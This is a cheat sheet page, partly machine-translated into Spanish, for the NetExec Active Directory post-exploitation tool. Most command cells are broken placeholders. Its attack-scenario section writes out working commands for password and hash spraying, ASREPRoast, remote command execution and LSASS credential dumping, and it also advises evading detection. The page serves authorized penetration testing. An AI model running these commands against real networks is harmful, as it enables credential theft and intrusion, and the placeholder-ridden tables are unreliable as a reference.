Saltar a contenido

NetExec

__HTML_TAG_102_ Todos los comandos

NetExec (antes CrackMapExec) es una herramienta post-explotación que ayuda a automatizar la evaluación de la seguridad de las grandes redes Active Directory a través del abuso de protocolo de red y ataques credenciales.

Instalación > Configuración

Command Description
INLINE_CODE_4 Install NetExec via pip
INLINE_CODE_5 Install with pipx (recommended)
INLINE_CODE_6 Clone from GitHub
INLINE_CODE_7 Install from source
INLINE_CODE_8 Check installed version
INLINE_CODE_9 Display help information

Uso básico

Command Description
INLINE_CODE_10 Scan SMB on subnet
INLINE_CODE_11 Authenticate with credentials
INLINE_CODE_12 Authenticate with NTLM hash
INLINE_CODE_13 Anonymous authentication
INLINE_CODE_14 Use target file

Protocol Support

SMB Protocol

Command Description
INLINE_CODE_15 Basic SMB enumeration
INLINE_CODE_16 Enumerate shares
INLINE_CODE_17 Enumerate users
INLINE_CODE_18 Enumerate groups
INLINE_CODE_19 Enumerate local groups
INLINE_CODE_20 Enumerate sessions
INLINE_CODE_21 Enumerate disks

WinRM Protocol

Command Description
INLINE_CODE_22 WinRM authentication
INLINE_CODE_23 Execute command
INLINE_CODE_24 Execute PowerShell script
_
### LDAP Protocol
Command Description
--------- -------------
INLINE_CODE_25 LDAP authentication
INLINE_CODE_26 Enumerate LDAP users
INLINE_CODE_27 Enumerate LDAP groups
INLINE_CODE_28 Enumerate computers

MSSQL Protocol__TABLE_113_

SSH Protocol

Command Description
INLINE_CODE_32 SSH authentication
INLINE_CODE_33 SSH key authentication
INLINE_CODE_34 Execute command

Métodos de autenticación

Password Authentication

Command Description
INLINE_CODE_35 Single credential
INLINE_CODE_36 Credential lists
INLINE_CODE_37 Password spraying
INLINE_CODE_38 User enumeration

Hash Authentication

Command Description
INLINE_CODE_39 NTLM hash
INLINE_CODE_40 LM:NTLM hash
INLINE_CODE_41 Hash lists

Kerberos Authentication

Command Description
INLINE_CODE_42 Kerberos authentication
INLINE_CODE_43 Use Kerberos cache
INLINE_CODE_44 Force Kerberos

Enumeration

Compartir Enumeración

Command Description
INLINE_CODE_45 List shares
INLINE_CODE_46 Authenticated share listing
INLINE_CODE_47 Spider share contents
INLINE_CODE_48 Search for files

Enumeración del usuario

Command Description
INLINE_CODE_49 Enumerate users
INLINE_CODE_50 RID bruteforce
INLINE_CODE_51 RID range
_
### Group Enumeration_
Command Description
--------- -------------
INLINE_CODE_52 Enumerate groups
INLINE_CODE_53 Local groups
INLINE_CODE_54 Specific group

Enumeración de computadora

Command Description
INLINE_CODE_55 Enumerate computers
INLINE_CODE_56 SMB computer enumeration
__
## Command Execution

SMB Command Execution

Command Description
INLINE_CODE_57 Execute command
INLINE_CODE_58 Execute PowerShell script
INLINE_CODE_59 Use WMI execution
INLINE_CODE_60 Use SMB execution

WinRM Ejecución del comando

Command Description
INLINE_CODE_61 PowerShell command
INLINE_CODE_62 Execute script
_
## Módulos

Módulos incorporados

Command Description
INLINE_CODE_63 Enhanced spidering
INLINE_CODE_64 Enumerate AV products
INLINE_CODE_65 Group Policy Preferences
INLINE_CODE_66 LSASS dumping
INLINE_CODE_67 Mimikatz execution

Opciones de módulo

Command Description
INLINE_CODE_68 Module options
INLINE_CODE_69 Bloodhound output

Database Operations

Command Description
INLINE_CODE_70 Export to CSV
INLINE_CODE_71 Database management
INLINE_CODE_72 Set workspace
INLINE_CODE_73 Clear database

Características avanzadas

Credential Stuffing

Command Description
INLINE_CODE_74 Continue on success
INLINE_CODE_75 Fail limit

Password Policy

Command Description
INLINE_CODE_76 Get password policy
INLINE_CODE_77 LDAP password policy
_
## Bloodhound Integration
Command Description
--------- -------------
INLINE_CODE_78 Collect Bloodhound data
INLINE_CODE_79 All collections
_
## ASREPRoast_TABLE_130__
### Kerberoasting
Command Description
--------- -------------
INLINE_CODE_82 Kerberoasting attack
_
## Output and Logging
Command Description
INLINE_CODE_83 Verbose output
INLINE_CODE_84 Debug output
INLINE_CODE_85 Save output to file
INLINE_CODE_86 Log directory

Configuración

Config File (~/.nxc/nxc.conf)

[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0

Protocol-specific Options

Command Description
INLINE_CODE_87 Custom port
INLINE_CODE_88 Connection timeout
INLINE_CODE_89 Thread count

Evasion Techniques

Command Description
INLINE_CODE_90 Random delay
INLINE_CODE_91 Fixed delay
INLINE_CODE_92 Obfuscation

Common Attack Scenarios

Domain Enumeration

# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol

Credential Attacks

# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt

Post-Exploitation

# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy

# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All

Integración con otras herramientas

Impacket Integration

Command Description
INLINE_CODE_93 Use Impacket WMI
INLINE_CODE_94 Use Impacket SMB

Crackmapexec Migration

Command Description
INLINE_CODE_95 Convert CME database
INLINE_CODE_96 Create alias for compatibility
_
## Troubleshooting
Command Description
INLINE_CODE_97 General help
INLINE_CODE_98 Protocol-specific help
INLINE_CODE_99 Version information
INLINE_CODE_100 Debug mode

Buenas prácticas

  • Use autenticación antes de la enumeración cuando sea posible
  • Implementar las demoras adecuadas para evitar la detección
  • Utilice espacios de trabajo para organizar diferentes compromisos
  • Resultados de las exportaciones para un análisis ulterior
  • Combinar con otros instrumentos para una evaluación integral
  • Monitor para respuestas defensivas
  • Usar los recuentos adecuados para evitar objetivos abrumadores
  • Implementar registros adecuados para la documentación
  • Validar las credenciales antes de ataques a gran escala
  • Use técnicas de obfuscación cuando sea necesario

Security Considerations

  • Únicamente uso en redes autorizadas
  • Realizar controles adecuados de acceso
  • Monitor de detección por herramientas de seguridad
  • Utilizar principios mínimos de privilegio
  • Documentar todas las actividades de cumplimiento
  • Coordinar con equipo azul cuando corresponda
  • Aplicar procedimientos adecuados de limpieza
  • Sus credenciales de almacenamiento de forma segura
  • Usar comunicación encriptada cuando sea posible
  • Actualizaciones periódicas para mantener la eficacia